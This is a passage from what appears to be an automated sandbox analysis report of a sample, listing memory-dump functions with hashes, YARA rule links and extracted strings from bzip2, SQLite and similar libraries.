                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-3894466517
                                                                                                                                                                                                                                                                    • Opcode ID: a795c7ce3634cae38f4d320bfb7043b724aba026ad47a4d3d8bcb9e9dd899c8c
                                                                                                                                                                                                                                                                    • Instruction ID: 7fb7cbafcd355731d5fda3726f8202475528b98ca5b760c83c221b417fb91bce
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a795c7ce3634cae38f4d320bfb7043b724aba026ad47a4d3d8bcb9e9dd899c8c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04317EF2B18E918AE702AF78D8981F937B2BB06724F644135DE0C46B9CDE38D914C790
                                                                                                                                                                                                                                                                    Function 00007FFB1BB1C848 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • 1.0.8, 13-Jul-2019, xrefs: 00007FFB1BB1C85B
                                                                                                                                                                                                                                                                    • bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth, xrefs: 00007FFB1BB1C868
                                                                                                                                                                                                                                                                    • *** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac, xrefs: 00007FFB1BB1C88A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth$*** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac$1.0.8, 13-Jul-2019
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-989448446
                                                                                                                                                                                                                                                                    • Opcode ID: c443f8599619f465039602253ad6094531c12857767df4a9adef1f549da5319b
                                                                                                                                                                                                                                                                    • Instruction ID: 9cfe8221cf522b3c15baa9ea00c58603663bbca0d3e369e5b97394e866493271
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c443f8599619f465039602253ad6094531c12857767df4a9adef1f549da5319b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE06DD8E18D06E2FB38A774F8953761357FF94760F00A439C90E0AEB1DD2C25148341
                                                                                                                                                                                                                                                                    Function 00007FFB1C25967C Relevance: 9.2, APIs: 6, Instructions: 160COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 168861036-0
                                                                                                                                                                                                                                                                    • Opcode ID: fb95027d3fcee506583ce7d96f70b522a78626fdc6e378da2ca402aa0a92e4da
                                                                                                                                                                                                                                                                    • Instruction ID: 40b75ef8fc129309bc21f9a9f656145fed7cf685b98d880b01e742b81883f331
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb95027d3fcee506583ce7d96f70b522a78626fdc6e378da2ca402aa0a92e4da
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53717DF2B18E9286EB10AB75D8483ED37A2BB06764F648035DA0D07795CF79E856C380
                                                                                                                                                                                                                                                                    Function 00007FFB0C0BEDE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 390COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-1299490920
                                                                                                                                                                                                                                                                    • Opcode ID: fa3dc690295e3f608377f27ab0a4f558a20eccf051d3fb6e08adeb7d0f797da8
                                                                                                                                                                                                                                                                    • Instruction ID: 68e860147e72075fe797f3b83a5b11ceaebad8fe1ebc3e086bb3a3c80b3d0ea0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa3dc690295e3f608377f27ab0a4f558a20eccf051d3fb6e08adeb7d0f797da8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44028BF6A08B8282EA55CB65D848BB977A2FF44B94F044235EA9D07795EF3CE446C304
                                                                                                                                                                                                                                                                    Function 00007FFB0C04C000 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 366COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
                                                                                                                                                                                                                                                                    • Instruction ID: 19bf43ca4be0041bd1ad431693218387ed12107279a4c8f6804441716cffca49
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F17CF2609B8186E7909F65E048BAE77A4FB45B94F108036EF8E43795EF39D844C704
                                                                                                                                                                                                                                                                    Function 00007FFB0C086680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 338COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00007FFB0C086A2E
                                                                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 00007FFB0C086705
                                                                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFB0C08672E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-272990098
                                                                                                                                                                                                                                                                    • Opcode ID: 92dd0ee7cd3e1cdafc56de997d58c6f6f428c161758f1bf7218e81256f987700
                                                                                                                                                                                                                                                                    • Instruction ID: 9a696cf0ec2dca213edcf4f7a16e0a3a523182c2a220e7a05b504d1c668eabe3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92dd0ee7cd3e1cdafc56de997d58c6f6f428c161758f1bf7218e81256f987700
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BD1F3E2A0978182EB25CB21D048E796BA1FF55BD4F458131EE9D03785EF3DE549C708
                                                                                                                                                                                                                                                                    Function 00007FFB1C2550B0 Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3741236498-0
                                                                                                                                                                                                                                                                    • Opcode ID: d800493cf60e4af3f4a7c920cc646ece182b7dab7bd32bb736cb4877c8bf044e
                                                                                                                                                                                                                                                                    • Instruction ID: 1620fdf2235e6ab261075ba10d6991726bfd89fb09ec0fcc8c9a6b2bacbe576c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d800493cf60e4af3f4a7c920cc646ece182b7dab7bd32bb736cb4877c8bf044e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9531A6A2B15F5152EE15EB39E8085EA27A2BF09BF4B658631DD1D43380EE3DD842C390
                                                                                                                                                                                                                                                                    Function 00007FFB0C0455D0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
                                                                                                                                                                                                                                                                    • Instruction ID: 6f8b1e1a7e562edea2cd94494a6022cf9100a4b298cda5a28b7b50e4bbfbea93
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACD19EF2A0868587DB60CF65E848BAAB3A5FF84B84F554036DE4D47794EF38D841C744
                                                                                                                                                                                                                                                                    Function 00007FFB0C078C10 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 299COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-1987291987
                                                                                                                                                                                                                                                                    • Opcode ID: 697807ff2bef80b0a8f6c162638d2e41be052984f89453d995ead0cb1d7b40fc
                                                                                                                                                                                                                                                                    • Instruction ID: a9afe59ef0ab6ebf0018adde6176277bf0f78a02c63e38b17fa4ba85dd2adb86
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 697807ff2bef80b0a8f6c162638d2e41be052984f89453d995ead0cb1d7b40fc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CC1D4E1A08A8185EA19CF25E448A7967A1FF45BE0F688335DE6E077E4EF3CE454C704
                                                                                                                                                                                                                                                                    Function 00007FFB0C041040 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                                                    • Instruction ID: 0c462e05e40bfcf697d84cf158d4ebac5a0fa8468a72e414274017eab86c3227
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADA1E9F2A0C2D185D7648B29D498ABE7BA2FF80781F454235DB8A83745EF3CE495C714
                                                                                                                                                                                                                                                                    Function 00007FFB1B6FAD70 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 215COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007F805
                                                                                                                                                                                                                                                                    • String ID: Pointer indices must be integer$slice start is required for step < 0$slice step cannot be zero$slice stop is required
                                                                                                                                                                                                                                                                    • API String ID: 4011786353-3059441807
                                                                                                                                                                                                                                                                    • Opcode ID: ade25bbd3f50eefddba590a24cab0693854007375ec98fc59b974406f104237a
                                                                                                                                                                                                                                                                    • Instruction ID: 2fec624dbf6d1f15f8223d067b493e5640b4408a8d3e40b5d5239a91a7d93627
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ade25bbd3f50eefddba590a24cab0693854007375ec98fc59b974406f104237a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 429139A1B09E0281EE159B36EDA4138A367AF65FF0B44E536E92D47BF4DF2CE4459300
                                                                                                                                                                                                                                                                    Function 00007FFB0C077CA0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 215COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2063813899
                                                                                                                                                                                                                                                                    • Opcode ID: 6f3502865f2554c3b22856db225aa2943b439a183bdfd32a53b0fa553fb1f819
                                                                                                                                                                                                                                                                    • Instruction ID: cf53adfb51073ff6af2351a0298f4ab880cf10ab832fbedbb7b6e0c93c98aecd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f3502865f2554c3b22856db225aa2943b439a183bdfd32a53b0fa553fb1f819
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1591CDE2A09B9182EB56CF29D418AB977A1FF88BC0F558235DE8D47785EF38E440C304
                                                                                                                                                                                                                                                                    Function 00007FFB0C048690 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
